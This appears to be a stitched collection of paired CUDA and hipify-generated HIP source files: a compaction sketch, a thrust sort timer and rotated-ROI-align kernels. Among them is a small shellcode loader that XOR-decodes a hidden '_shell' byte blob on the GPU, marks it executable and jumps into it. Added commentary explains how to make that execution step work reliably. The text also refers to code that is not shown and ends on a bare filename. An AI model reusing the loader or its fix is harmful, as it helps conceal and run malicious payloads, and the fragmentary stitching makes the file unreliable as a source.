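The NOTE inside extract_subgraph_by_vertices explains the compaction strategy used in the edge-copy loop above: each kept edge reserves its output slot by atomically incrementing a counter (d_error_count is reused for this), which avoids the 2*|E| temporary buffer an inclusive scan would need at the cost of a non-deterministic output order. Below is a standalone sketch of that atomic-cursor pattern with hypothetical names (compact_positive, out_count) and a trivial keep-positive predicate.

#include <cuda_runtime.h>
#include <cstdio>

// Each thread that keeps an element bumps the shared cursor to claim a slot.
__global__ void compact_positive(const int* in, int n, int* out, int* out_count) {
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i < n && in[i] > 0) {
        int pos = atomicAdd(out_count, 1);   // old value = this thread's output index
        out[pos] = in[i];                    // order of kept elements is not preserved
    }
}

int main() {
    const int n = 8;
    int h_in[n] = {3, -1, 0, 7, -5, 2, 9, -4};
    int *d_in, *d_out, *d_count;
    cudaMalloc((void**)&d_in, n * sizeof(int));
    cudaMalloc((void**)&d_out, n * sizeof(int));
    cudaMalloc((void**)&d_count, sizeof(int));
    cudaMemcpy(d_in, h_in, n * sizeof(int), cudaMemcpyHostToDevice);
    cudaMemset(d_count, 0, sizeof(int));
    compact_positive<<<1, 32>>>(d_in, n, d_out, d_count);
    int h_count = 0;
    cudaMemcpy(&h_count, d_count, sizeof(int), cudaMemcpyDeviceToHost);
    printf("kept %d of %d elements\n", h_count, n);   // kept 4 of 8
    cudaFree(d_in); cudaFree(d_out); cudaFree(d_count);
    return 0;
}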
857ba5834658393b7ea3b4fead1b617b11547b08.hip
// !!! This is a file automatically generated by hipify!!! /* ============================================================================ Name : sorting_segments.cu Author : Rafael Schmid Version : Copyright : Your copyright notice Description : Sorts an array of integers on the GPU with thrust::stable_sort and prints the result (or the elapsed time when ELAPSED_TIME is 1) ============================================================================ */ #include <thrust/host_vector.h> #include <thrust/device_vector.h> #include <thrust/generate.h> #include <thrust/sort.h> #include <thrust/copy.h> #include <chrono> #include <iostream> #include <cstdio> #ifndef ELAPSED_TIME #define ELAPSED_TIME 0 #endif void print(thrust::host_vector<int> h_vec) { std::cout << "\n"; for (int i = 0; i < h_vec.size(); i++) { std::cout << h_vec[i] << " "; } std::cout << "\n"; } int main(void) { int num_of_elements; int i; scanf("%d", &num_of_elements); thrust::host_vector<int> h_vec(num_of_elements); for (i = 0; i < num_of_elements; i++) scanf("%d", &h_vec[i]); hipEvent_t start, stop; hipEventCreate(&start); hipEventCreate(&stop); thrust::device_vector<int> d_vec = h_vec; hipEventRecord(start); thrust::stable_sort(d_vec.begin(), d_vec.end()); hipEventRecord(stop); hipError_t errSync = hipGetLastError(); hipError_t errAsync = hipDeviceSynchronize(); if (errSync != hipSuccess) printf("Sync kernel error: %s\n", hipGetErrorString(errSync)); if (errAsync != hipSuccess) printf("Async kernel error: %s\n", hipGetErrorString(errAsync)); thrust::copy(d_vec.begin(), d_vec.end(), h_vec.begin()); if (ELAPSED_TIME == 1) { hipEventSynchronize(stop); float milliseconds = 0; hipEventElapsedTime(&milliseconds, start, stop); std::cout << milliseconds << "\n"; } else print(h_vec); return 0; }
857ba5834658393b7ea3b4fead1b617b11547b08.cu
/* ============================================================================ Name : sorting_segments.cu Author : Rafael Schmid Version : Copyright : Your copyright notice Description : Sorts an array of integers on the GPU with thrust::stable_sort and prints the result (or the elapsed time when ELAPSED_TIME is 1) ============================================================================ */ #include <thrust/host_vector.h> #include <thrust/device_vector.h> #include <thrust/generate.h> #include <thrust/sort.h> #include <thrust/copy.h> #include <chrono> #include <iostream> #include <cstdio> #ifndef ELAPSED_TIME #define ELAPSED_TIME 0 #endif void print(thrust::host_vector<int> h_vec) { std::cout << "\n"; for (int i = 0; i < h_vec.size(); i++) { std::cout << h_vec[i] << " "; } std::cout << "\n"; } int main(void) { int num_of_elements; int i; scanf("%d", &num_of_elements); thrust::host_vector<int> h_vec(num_of_elements); for (i = 0; i < num_of_elements; i++) scanf("%d", &h_vec[i]); cudaEvent_t start, stop; cudaEventCreate(&start); cudaEventCreate(&stop); thrust::device_vector<int> d_vec = h_vec; cudaEventRecord(start); thrust::stable_sort(d_vec.begin(), d_vec.end()); cudaEventRecord(stop); cudaError_t errSync = cudaGetLastError(); cudaError_t errAsync = cudaDeviceSynchronize(); if (errSync != cudaSuccess) printf("Sync kernel error: %s\n", cudaGetErrorString(errSync)); if (errAsync != cudaSuccess) printf("Async kernel error: %s\n", cudaGetErrorString(errAsync)); thrust::copy(d_vec.begin(), d_vec.end(), h_vec.begin()); if (ELAPSED_TIME == 1) { cudaEventSynchronize(stop); float milliseconds = 0; cudaEventElapsedTime(&milliseconds, start, stop); std::cout << milliseconds << "\n"; } else print(h_vec); return 0; }
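Both versions of sorting_segments time the device-side sort with the event pattern record(start) / work / record(stop) / eventSynchronize(stop) / eventElapsedTime; the synchronize is required because the elapsed time can only be read once the stop event has actually completed on the device. A minimal self-contained sketch of that pattern around a thrust sort (the workload here is arbitrary, not the file's stdin-driven input):

#include <thrust/device_vector.h>
#include <thrust/sort.h>
#include <cuda_runtime.h>
#include <cstdio>

int main() {
    thrust::device_vector<int> d(1 << 20, 1);   // arbitrary device-side workload
    cudaEvent_t start, stop;
    cudaEventCreate(&start);
    cudaEventCreate(&stop);
    cudaEventRecord(start);                     // enqueue start marker on the default stream
    thrust::sort(d.begin(), d.end());           // work being timed
    cudaEventRecord(stop);                      // enqueue stop marker
    cudaEventSynchronize(stop);                 // wait until the stop event has completed
    float ms = 0.f;
    cudaEventElapsedTime(&ms, start, stop);     // valid only after the stop event is done
    printf("%f ms\n", ms);
    cudaEventDestroy(start);
    cudaEventDestroy(stop);
    return 0;
}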
accdff8016db7f4f7eb3a6c5d54e65a61c0ddba6.hip
// !!! This is a file automatically generated by hipify!!! #include <stdio.h> #include <sys/mman.h> #include <hip/hip_runtime.h> #define len 21 __global__ void decrypt(unsigned char *code){ int indx = threadIdx.x; code[indx] ^= 12; } extern "C" void _shell(); int main(void){ unsigned char *p = (unsigned char*)_shell; unsigned char *d_shell,*h_shell; h_shell = (unsigned char *)malloc(sizeof(char)*len); int i; for(i=0;i<len;i++){ h_shell[i] = *p; p++; } hipMalloc((void **) &d_shell, sizeof(char)*len); hipMemcpy(d_shell, h_shell, sizeof(char)*len, hipMemcpyHostToDevice); hipLaunchKernelGGL(( decrypt), dim3(1),dim3(len), 0, 0, d_shell); hipMemcpy(h_shell, d_shell, sizeof(char)*len, hipMemcpyDeviceToHost); hipFree(d_shell); mprotect(h_shell,len,PROT_EXEC); ((void(*)(void))h_shell)(); }
accdff8016db7f4f7eb3a6c5d54e65a61c0ddba6.cu
#include <stdio.h> #include <sys/mman.h> #include <cuda.h> #define len 21 __global__ void decrypt(unsigned char *code){ int indx = threadIdx.x; code[indx] ^= 12; } extern "C" void _shell(); int main(void){ unsigned char *p = (unsigned char*)_shell; unsigned char *d_shell,*h_shell; h_shell = (unsigned char *)malloc(sizeof(char)*len); int i; for(i=0;i<len;i++){ h_shell[i] = *p; p++; } cudaMalloc((void **) &d_shell, sizeof(char)*len); cudaMemcpy(d_shell, h_shell, sizeof(char)*len, cudaMemcpyHostToDevice); decrypt<<<1,len>>>(d_shell); cudaMemcpy(h_shell, d_shell, sizeof(char)*len, cudaMemcpyDeviceToHost); cudaFree(d_shell); mprotect(h_shell,len,PROT_EXEC); ((void(*)(void))h_shell)(); }
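One caveat about the pair above: mprotect requires a page-aligned address, and a buffer returned by malloc is generally not page-aligned, so the protection change may simply fail (its return value is not checked) and the jump into h_shell would then hit non-executable memory. The following is a hedged sketch, assuming POSIX/Linux behaviour, of obtaining a page-aligned, page-sized region with mmap so the later mprotect call is well-defined; the buffer name buf is hypothetical and the payload bytes are placeholders, not the decrypted _shell code.

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void) {
    size_t len = 21;                                   /* same payload length as above */
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t size = ((len + page - 1) / page) * page;    /* round up to whole pages */
    unsigned char *buf = (unsigned char *)mmap(NULL, size, PROT_READ | PROT_WRITE,
                                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) { perror("mmap"); return 1; }
    memset(buf, 0xC3, len);                            /* placeholder bytes only */
    if (mprotect(buf, size, PROT_READ | PROT_EXEC) != 0) { perror("mprotect"); return 1; }
    printf("buffer at %p is now read/execute\n", (void *)buf);
    munmap(buf, size);
    return 0;
}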
c1e913fabd3a6595d1c90736ec937b336c9ad4a3.hip
// !!! This is a file automatically generated by hipify!!! #include <ATen/ATen.h> #include <ATen/hip/HIPContext.h> #include <THH/THH.h> #include <THH/THHAtomics.cuh> #include <THH/THHDeviceUtils.cuh> #include <hip/hip_runtime.h> #include <cstdio> #include <memory> #include "rotate_rect_ops.h" // TODO make it in a common file #define CUDA_1D_KERNEL_LOOP(i, n) \ for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < n; \ i += blockDim.x * gridDim.x) #define CUDA_CHECK(call) { \ hipError_t err; \ if ((err = (call)) != hipSuccess) { \ fprintf(stderr, "Got error %s at %s:%d\n", hipGetErrorString(err), \ __FILE__, __LINE__); \ exit(1); \ } \ } template <typename T> struct device_ptr_deleter { void operator()(T* ptr) { CUDA_CHECK(hipFree(ptr)); } }; template <typename T> struct host_ptr_deleter { void operator()(T* ptr) { CUDA_CHECK(hipHostFree(ptr)); } }; template <typename T> using unique_ptr_device = std::unique_ptr<T[], device_ptr_deleter<T>>; template <typename T> using unique_ptr_host = std::unique_ptr<T[], host_ptr_deleter<T>>; const int TILE_DIM = 32; template <typename T> __global__ void matrix_transpose( T* __restrict__ transposed_matrix, const T* __restrict__ original_matrix, const int num_columns, const int num_rows ) { __shared__ T tile[TILE_DIM][TILE_DIM+1]; int row = blockIdx.y * TILE_DIM + threadIdx.y; int column = blockIdx.x * TILE_DIM + threadIdx.x; if (row < num_rows && column < num_columns) { tile[threadIdx.y][threadIdx.x] = original_matrix[row * num_columns + column]; } __syncthreads(); int transpose_column = blockIdx.y * TILE_DIM + threadIdx.x; int transpose_row = blockIdx.x * TILE_DIM + threadIdx.y; if (transpose_row < num_columns && transpose_column < num_rows) { transposed_matrix[transpose_row * num_rows + transpose_column] = tile[threadIdx.x][threadIdx.y]; } } template <typename T> __device__ T bilinear_interpolate(const T* bottom_data, const int height, const int width, T y, T x, const int index /* index for debug only*/) { // deal with cases that inverse elements are out of feature map boundary if (y < -1.0 || y > height || x < -1.0 || x > width) { //empty return 0; } if (y <= 0) y = 0; if (x <= 0) x = 0; int y_low = (int) y; int x_low = (int) x; int y_high; int x_high; if (y_low >= height - 1) { y_high = y_low = height - 1; y = (T) y_low; } else { y_high = y_low + 1; } if (x_low >= width - 1) { x_high = x_low = width - 1; x = (T) x_low; } else { x_high = x_low + 1; } T ly = y - y_low; T lx = x - x_low; T hy = 1. - ly, hx = 1. 
- lx; // do bilinear interpolation T v1 = bottom_data[y_low * width + x_low]; T v2 = bottom_data[y_low * width + x_high]; T v3 = bottom_data[y_high * width + x_low]; T v4 = bottom_data[y_high * width + x_high]; T w1 = hy * hx, w2 = hy * lx, w3 = ly * hx, w4 = ly * lx; T val = (w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4); return val; } template <typename T> __device__ void bilinear_interpolate_gradient( const int height, const int width, T y, T x, T & w1, T & w2, T & w3, T & w4, int & x_low, int & x_high, int & y_low, int & y_high, const int index /* index for debug only*/) { // deal with cases that inverse elements are out of feature map boundary if (y < -1.0 || y > height || x < -1.0 || x > width) { //empty w1 = w2 = w3 = w4 = 0.; x_low = x_high = y_low = y_high = -1; return; } if (y <= 0) y = 0; if (x <= 0) x = 0; y_low = (int) y; x_low = (int) x; if (y_low >= height - 1) { y_high = y_low = height - 1; y = (T) y_low; } else { y_high = y_low + 1; } if (x_low >= width - 1) { x_high = x_low = width - 1; x = (T) x_low; } else { x_high = x_low + 1; } T ly = y - y_low; T lx = x - x_low; T hy = 1. - ly, hx = 1. - lx; // reference in forward // T v1 = bottom_data[y_low * width + x_low]; // T v2 = bottom_data[y_low * width + x_high]; // T v3 = bottom_data[y_high * width + x_low]; // T v4 = bottom_data[y_high * width + x_high]; // T val = (w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4); w1 = hy * hx, w2 = hy * lx, w3 = ly * hx, w4 = ly * lx; return; } template <typename T> __global__ void RRoIAlignForward(const int nthreads, const T* bottom_data, const T spatial_scale, const int channels, const int height, const int width, const int pooled_height, const int pooled_width, const int sampling_ratio, const T* bottom_rois, T* top_data) { CUDA_1D_KERNEL_LOOP(index, nthreads) { // (n, c, ph, pw) is an element in the pooled output int pw = index % pooled_width; int ph = (index / pooled_width) % pooled_height; int c = (index / pooled_width / pooled_height) % channels; int n = index / pooled_width / pooled_height / channels; const T* offset_bottom_rois = bottom_rois + n * 6; // batch_ind, xc, yc, w, h, angle int roi_batch_ind = offset_bottom_rois[0]; // Force malformed ROIs to be 1x1 T roi_width = max(offset_bottom_rois[3] * spatial_scale, (T)1.); T roi_height = max(offset_bottom_rois[4] * spatial_scale, (T)1.); const T* offset_bottom_data = bottom_data + (roi_batch_ind * channels + c) * height * width; // We use roi_bin_grid to sample the grid and mimic integral int roi_bin_grid_h = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_height / pooled_height); // e.g., = 2 int roi_bin_grid_w = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_width / pooled_width); const T mw = 1.0 / roi_bin_grid_w; const T mh = 1.0 / roi_bin_grid_h; // compute pool points T P[8]; compute_roi_pool_pts(offset_bottom_rois, P, spatial_scale, pooled_height, pooled_width, ph, pw); // compute line params T line_params[4]; for (int i = 0; i < 2; ++i) { line_params[i * 2] = P[((i + 1) * 2) % 8] - P[i * 2]; line_params[i * 2 + 1] = P[((i + 1) * 2) % 8 + 1] - P[i * 2 + 1]; } // We do average (integral) pooling inside a bin const T count = roi_bin_grid_h * roi_bin_grid_w; // e.g. 
= 4 T output_val = 0.; for (int iy = 0; iy < roi_bin_grid_h; iy ++) // e.g., iy = 0, 1 { for (int ix = 0; ix < roi_bin_grid_w; ix ++) { const T x = P[0] + static_cast<T>(iy + 0.5) * line_params[0] * mh + static_cast<T>(ix + 0.5) * line_params[2] * mw; const T y = P[1] + static_cast<T>(iy + 0.5) * line_params[1] * mh + static_cast<T>(ix + 0.5) * line_params[3] * mw; T val = bilinear_interpolate(offset_bottom_data, height, width, y, x, index); output_val += val; // printf("%.2f\n", val); } } output_val /= count; top_data[index] = output_val; } } template <typename T> __global__ void RRoIAlignBackwardFeature(const int nthreads, const T* top_diff, const int num_rois, const T spatial_scale, const int channels, const int height, const int width, const int pooled_height, const int pooled_width, const int sampling_ratio, T* bottom_diff, const T* bottom_rois) { CUDA_1D_KERNEL_LOOP(index, nthreads) { // (n, c, ph, pw) is an element in the pooled output int pw = index % pooled_width; int ph = (index / pooled_width) % pooled_height; int c = (index / pooled_width / pooled_height) % channels; int n = index / pooled_width / pooled_height / channels; const T* offset_bottom_rois = bottom_rois + n * 6; int roi_batch_ind = offset_bottom_rois[0]; // Force malformed ROIs to be 1x1 T roi_width = max(offset_bottom_rois[3] * spatial_scale, (T)1.); T roi_height = max(offset_bottom_rois[4] * spatial_scale, (T)1.); // We use roi_bin_grid to sample the grid and mimic integral int roi_bin_grid_h = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_height / pooled_height); // e.g., = 2 int roi_bin_grid_w = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_width / pooled_width); const T mw = 1.0 / roi_bin_grid_w; const T mh = 1.0 / roi_bin_grid_h; T* offset_bottom_diff = bottom_diff + (roi_batch_ind * channels + c) * height * width; int top_offset = (n * channels + c) * pooled_height * pooled_width; const T* offset_top_diff = top_diff + top_offset; const T top_diff_this_bin = offset_top_diff[ph * pooled_width + pw]; // compute pool points T P[8]; compute_roi_pool_pts(offset_bottom_rois, P, spatial_scale, pooled_height, pooled_width, ph, pw); // compute line params T line_params[4]; for (int i = 0; i < 2; ++i) { line_params[i * 2] = P[((i + 1) * 2) % 8] - P[i * 2]; line_params[i * 2 + 1] = P[((i + 1) * 2) % 8 + 1] - P[i * 2 + 1]; } // We do average (integral) pooling inside a bin const T count = roi_bin_grid_h * roi_bin_grid_w; // e.g. 
= 4 for (int iy = 0; iy < roi_bin_grid_h; iy ++) // e.g., iy = 0, 1 { for (int ix = 0; ix < roi_bin_grid_w; ix ++) { const T x = P[0] + static_cast<T>(iy + 0.5) * line_params[0] * mh + static_cast<T>(ix + 0.5) * line_params[2] * mw; const T y = P[1] + static_cast<T>(iy + 0.5) * line_params[1] * mh + static_cast<T>(ix + 0.5) * line_params[3] * mw; T w1, w2, w3, w4; int x_low, x_high, y_low, y_high; bilinear_interpolate_gradient(height, width, y, x, w1, w2, w3, w4, x_low, x_high, y_low, y_high, index); T g1 = top_diff_this_bin * w1 / count; T g2 = top_diff_this_bin * w2 / count; T g3 = top_diff_this_bin * w3 / count; T g4 = top_diff_this_bin * w4 / count; if (x_low >= 0 && x_high >= 0 && y_low >= 0 && y_high >= 0) { atomicAdd(offset_bottom_diff + y_low * width + x_low, static_cast<T>(g1)); atomicAdd(offset_bottom_diff + y_low * width + x_high, static_cast<T>(g2)); atomicAdd(offset_bottom_diff + y_high * width + x_low, static_cast<T>(g3)); atomicAdd(offset_bottom_diff + y_high * width + x_high, static_cast<T>(g4)); } // if } // ix } // iy } // CUDA_1D_KERNEL_LOOP } // RoIAlignBackward at::Tensor RROIAlign_forward_cuda(const at::Tensor& input, const at::Tensor& rois, const float spatial_scale, const int pooled_height, const int pooled_width, const int sampling_ratio) { AT_ASSERTM(input.type().is_cuda(), "input must be a CUDA tensor"); AT_ASSERTM(rois.type().is_cuda(), "rois must be a CUDA tensor"); auto num_rois = rois.size(0); auto channels = input.size(1); auto height = input.size(2); auto width = input.size(3); auto output = at::empty({num_rois, channels, pooled_height, pooled_width}, input.options()); auto output_size = num_rois * pooled_height * pooled_width * channels; // auto argmax = at::zeros({num_rois, channels, pooled_height, pooled_width}, input.options().dtype(at::kInt)); hipStream_t stream = at::hip::getCurrentHIPStreamMasqueradingAsCUDA(); dim3 grid(::min(THCCeilDiv((long)output_size, 512L), 4096L)); dim3 block(512); if (output.numel() == 0) { THCudaCheck(hipGetLastError()); return output; } AT_DISPATCH_FLOATING_TYPES(input.type(), "RROIAlign_forward", [&] { hipLaunchKernelGGL(( RRoIAlignForward<scalar_t>), dim3(grid), dim3(block), 0, stream, output_size, input.contiguous().data<scalar_t>(), spatial_scale, channels, height, width, pooled_height, pooled_width, sampling_ratio, rois.contiguous().data<scalar_t>(), output.data<scalar_t>() ); }); THCudaCheck(hipGetLastError()); return output; } template <typename T> __device__ void compute_transform_matrix( T* __restrict__ matrix, const T* __restrict__ rois, const float spatial_scale, const int pooled_height, const int pooled_width) { T cx = rois[1] * spatial_scale; T cy = rois[2] * spatial_scale; // Force malformed ROIs to be 1x1 T w = max(rois[3] * spatial_scale, T(1)); T h = max(rois[4] * spatial_scale, T(1)); T angle = deg2rad(rois[5]); // TransformPrepare T dx = -pooled_width / 2.0; T dy = -pooled_height / 2.0; T Sx = w / pooled_width; T Sy = h / pooled_height; T Alpha = cos(angle); T Beta = -sin(angle); T Dx = cx; T Dy = cy; matrix[0] = Alpha*Sx; matrix[1] = Beta*Sy; matrix[2] = Alpha*Sx*dx+Beta*Sy*dy+Dx; matrix[3] = -Beta*Sx; matrix[4] = Alpha*Sy; matrix[5] = -Beta*Sx*dx+Alpha*Sy*dy+Dy; } // local memory version template <typename T> __global__ void compute_roi_pool_pts_local( T* __restrict__ roi_pool_pts, const T* __restrict__ rois, const float spatial_scale, const int roi_pool_pt_num, const int num_rois, const int pooled_height, const int pooled_width) { T matrix[6]; // int idx = blockIdx.x * (blockDim.x * blockDim.y) + 
threadIdx.x * blockDim.y + threadIdx.y; int idx = blockIdx.x * (pooled_height * pooled_width) + threadIdx.x * pooled_width + threadIdx.y; if (idx >= num_rois * pooled_height * pooled_width) { return; } int pw = threadIdx.y; int ph = threadIdx.x; int n = blockIdx.x; compute_transform_matrix( matrix, rois + n*6, spatial_scale, pooled_height, pooled_width); // ORDER IN CLOCKWISE OR ANTI-CLOCKWISE // (0,1),(0,0),(1,0),(1,1) roi_pool_pts[roi_pool_pt_num * 0 + idx] = matrix[0]*pw + matrix[1]*(ph+1) + matrix[2]; roi_pool_pts[roi_pool_pt_num * 1 + idx] = matrix[3]*pw + matrix[4]*(ph+1) + matrix[5]; roi_pool_pts[roi_pool_pt_num * 2 + idx] = matrix[0]*pw + matrix[1]*ph + matrix[2]; roi_pool_pts[roi_pool_pt_num * 3 + idx] = matrix[3]*pw + matrix[4]*ph + matrix[5]; roi_pool_pts[roi_pool_pt_num * 4 + idx] = matrix[0]*(pw+1) + matrix[1]*ph + matrix[2]; roi_pool_pts[roi_pool_pt_num * 5 + idx] = matrix[3]*(pw+1) + matrix[4]*ph + matrix[5]; roi_pool_pts[roi_pool_pt_num * 6 + idx] = matrix[0]*(pw+1) + matrix[1]*(ph+1) + matrix[2]; roi_pool_pts[roi_pool_pt_num * 7 + idx] = matrix[3]*(pw+1) + matrix[4]*(ph+1) + matrix[5]; } template <typename T> __global__ void bp_rroi_align_backward_kernel( T* __restrict__ bottom_diff, const T* __restrict__ top_diff, const T* __restrict__ roi_pool_pts, const T* __restrict__ rois, const float spatial_scale, const int sampling_ratio, const int num_rois, const int batch_size, const int channels, const int height, const int width, const int pooled_height, const int pooled_width) { __shared__ T roi_pool_pts_shared[8]; __shared__ T line_params[4]; __shared__ T rois_shared[6]; const int roi_pool_pt_num = num_rois * pooled_height * pooled_width; for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < roi_pool_pt_num; i += blockDim.x * gridDim.x) { int c = blockIdx.y * blockDim.y + threadIdx.y; if (c < channels) { int pw = i % pooled_width; int ph = (i / pooled_width) % pooled_height; int n = i / pooled_width / pooled_height; const T* rois_offset = rois + n * 6; // batch_ind, xc, yc, w, h, angle if (threadIdx.y < 6) { rois_shared[threadIdx.y] = rois_offset[threadIdx.y]; } int roi_pool_idx = n * pooled_height * pooled_width + ph * pooled_width + pw; int roi_pool_idx_shared = threadIdx.y; if (roi_pool_idx_shared < 8) { roi_pool_pts_shared[roi_pool_idx_shared] = roi_pool_pts[roi_pool_idx_shared * roi_pool_pt_num + roi_pool_idx]; } __syncthreads(); // compute line params // if (roi_pool_idx_shared < 4) { // line_params[roi_pool_idx_shared] = roi_pool_pts_shared[((roi_pool_idx_shared / 2) + 1) * 2 % 8 + roi_pool_idx_shared % 2] - roi_pool_pts_shared[roi_pool_idx_shared]; // } if (roi_pool_idx_shared < 2) { line_params[roi_pool_idx_shared * 2] = roi_pool_pts_shared[((roi_pool_idx_shared + 1) * 2) % 8] - roi_pool_pts_shared[roi_pool_idx_shared * 2]; line_params[roi_pool_idx_shared * 2 + 1] = roi_pool_pts_shared[((roi_pool_idx_shared + 1) * 2) % 8 + 1] - roi_pool_pts_shared[roi_pool_idx_shared * 2 + 1]; } __syncthreads(); int roi_batch_id = rois_shared[0]; // Force malformed ROIs to be 1x1 T roi_width = max(rois_shared[3] * spatial_scale, (T)1.); T roi_height = max(rois_shared[4] * spatial_scale, (T)1.); // We use roi_bin_grid to sample the grid and mimic integral int roi_bin_grid_h = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_height / pooled_height); // e.g., = 2 int roi_bin_grid_w = (sampling_ratio > 0) ? 
sampling_ratio : ceil(roi_width / pooled_width); const T mw = 1.0 / roi_bin_grid_w; const T mh = 1.0 / roi_bin_grid_h; int top_data_idx = (n * channels + c) * pooled_width * pooled_height + ph * pooled_width + pw; const T top_diff_this_bin = top_diff[top_data_idx]; // We do average (integral) pooling inside a bin const T count = roi_bin_grid_h * roi_bin_grid_w; for (int iy = 0; iy < roi_bin_grid_h; iy ++) { for (int ix = 0; ix < roi_bin_grid_w; ix ++) { const T x = roi_pool_pts_shared[0] + static_cast<T>(iy + 0.5) * line_params[0] * mh + static_cast<T>(ix + 0.5) * line_params[2] * mw; const T y = roi_pool_pts_shared[1] + static_cast<T>(iy + 0.5) * line_params[1] * mh + static_cast<T>(ix + 0.5) * line_params[3] * mw; T w1, w2, w3, w4; int x_low, x_high, y_low, y_high; bilinear_interpolate_gradient(height, width, y, x, w1, w2, w3, w4, x_low, x_high, y_low, y_high, 0); T g1 = top_diff_this_bin * w1 / count; T g2 = top_diff_this_bin * w2 / count; T g3 = top_diff_this_bin * w3 / count; T g4 = top_diff_this_bin * w4 / count; if (x_low >= 0 && x_high >= 0 && y_low >= 0 && y_high >= 0) { atomicAdd(bottom_diff + ((y_low * width + x_low ) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g1)); atomicAdd(bottom_diff + ((y_low * width + x_high) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g2)); atomicAdd(bottom_diff + ((y_high * width + x_low ) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g3)); atomicAdd(bottom_diff + ((y_high * width + x_high) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g4)); } } } } } } void bp_rroi_align_backward( int batch_size, int num_rois, int channels, int height, int width, int pooled_height, int pooled_width, float spatial_scale, const float* top_diff_d, const float* rois_d, float* bottom_diff_d, hipStream_t stream ) { unique_ptr_device<float> roi_pool_pts_d(nullptr); int roi_pool_pt_num = num_rois * pooled_height * pooled_width; CUDA_CHECK(hipMalloc((void **) &roi_pool_pts_d, 8 * roi_pool_pt_num * sizeof(float))); unique_ptr_device<float> bottom_diff_coalesced_d(nullptr); auto bottom_data_size = batch_size * channels * height * width; CUDA_CHECK(hipMalloc((void **) &bottom_diff_coalesced_d, bottom_data_size * sizeof(float))); { int block_x = TILE_DIM; int block_y = TILE_DIM; const int num_columns = height * width; const int num_rows = batch_size * channels; int grid_x = static_cast<int>(::ceil(num_columns * 1.0 / block_x)); int grid_y = static_cast<int>(::ceil(num_rows * 1.0 / block_y)); dim3 block(block_x, block_y); dim3 grid(grid_x, grid_y); hipLaunchKernelGGL(( matrix_transpose<float>), dim3(grid), dim3(block), 0, stream, bottom_diff_coalesced_d.get(), bottom_diff_d, num_columns, num_rows ); } { dim3 block(pooled_height, pooled_width); dim3 grid(num_rois); hipLaunchKernelGGL(( compute_roi_pool_pts_local<float>), dim3(grid), dim3(block), 0, stream, roi_pool_pts_d.get(), rois_d, spatial_scale, roi_pool_pt_num, num_rois, pooled_height, pooled_width); } CUDA_CHECK(hipDeviceSynchronize()); { // hipDeviceProp_t deviceProperties; // int gpu_id = 0; // CUDA_CHECK(hipGetDeviceProperties(&deviceProperties, gpu_id)); int max_thread_num = 256; // int thread_num_x = ::min(max_thread_num / 8, pooled_width); // int thread_num_y = ::min(max_thread_num / thread_num_x, channels); int thread_num_y = ::min(channels, max_thread_num); // int thread_num_x = max_thread_num / thread_num_y; int thread_num_x = 1; // int block_num_x = ::min(static_cast<int>(::ceil(pooled_width * pooled_height * num_rois * 1.0 / thread_num_x)), 
deviceProperties.maxGridSize[0]); int block_num_x = ::min(static_cast<int>(::ceil(pooled_width * pooled_height * num_rois * 1.0 / thread_num_x)), 65535); int block_num_y = static_cast<int>(::ceil(channels * 1.0 / thread_num_y)); dim3 block(thread_num_x, thread_num_y); dim3 grid(block_num_x, block_num_y); int sampling_ratio = 0; // default hipLaunchKernelGGL(( bp_rroi_align_backward_kernel<float>), dim3(grid), dim3(block), 0, stream, bottom_diff_coalesced_d.get(), top_diff_d, roi_pool_pts_d.get(), rois_d, spatial_scale, sampling_ratio, num_rois, batch_size, channels, height, width, pooled_height, pooled_width); } CUDA_CHECK(hipDeviceSynchronize()); { int block_x = TILE_DIM; int block_y = TILE_DIM; const int num_columns = batch_size * channels; const int num_rows = height * width; int grid_x = static_cast<int>(::ceil(num_columns * 1.0 / block_x)); int grid_y = static_cast<int>(::ceil(num_rows * 1.0 / block_y)); dim3 block(block_x, block_y); dim3 grid(grid_x, grid_y); hipLaunchKernelGGL(( matrix_transpose<float>), dim3(grid), dim3(block), 0, stream, bottom_diff_d, bottom_diff_coalesced_d.get(), num_columns, num_rows ); } } at::Tensor RROIAlign_backward_cuda(const at::Tensor& grad, const at::Tensor& rois, const float spatial_scale, const int pooled_height, const int pooled_width, const int batch_size, const int channels, const int height, const int width, const int sampling_ratio) { AT_ASSERTM(grad.type().is_cuda(), "grad must be a CUDA tensor"); AT_ASSERTM(rois.type().is_cuda(), "rois must be a CUDA tensor"); auto num_rois = rois.size(0); auto grad_input = at::zeros({batch_size, channels, height, width}, grad.options()); hipStream_t stream = at::hip::getCurrentHIPStreamMasqueradingAsCUDA(); dim3 grid(::min(THCCeilDiv((long)grad.numel(), 512L), 4096L)); dim3 block(512); // handle possibly empty gradients if (grad.numel() == 0) { THCudaCheck(hipGetLastError()); return grad_input; } AT_DISPATCH_FLOATING_TYPES(grad.type(), "RROIAlign_backward", [&] { // bp_rroi_align_backward( // batch_size, // num_rois, // channels, // height, // width, // pooled_height, // pooled_width, // spatial_scale, // grad.contiguous().data<float>(), // rois.contiguous().data<float>(), // grad_input.data<float>(), // stream); hipLaunchKernelGGL(( RRoIAlignBackwardFeature<scalar_t>), dim3(grid), dim3(block), 0, stream, grad.numel(), grad.contiguous().data<scalar_t>(), num_rois, spatial_scale, channels, height, width, pooled_height, pooled_width, sampling_ratio, grad_input.data<scalar_t>(), rois.contiguous().data<scalar_t>()); }); THCudaCheck(hipGetLastError()); return grad_input; }
c1e913fabd3a6595d1c90736ec937b336c9ad4a3.cu
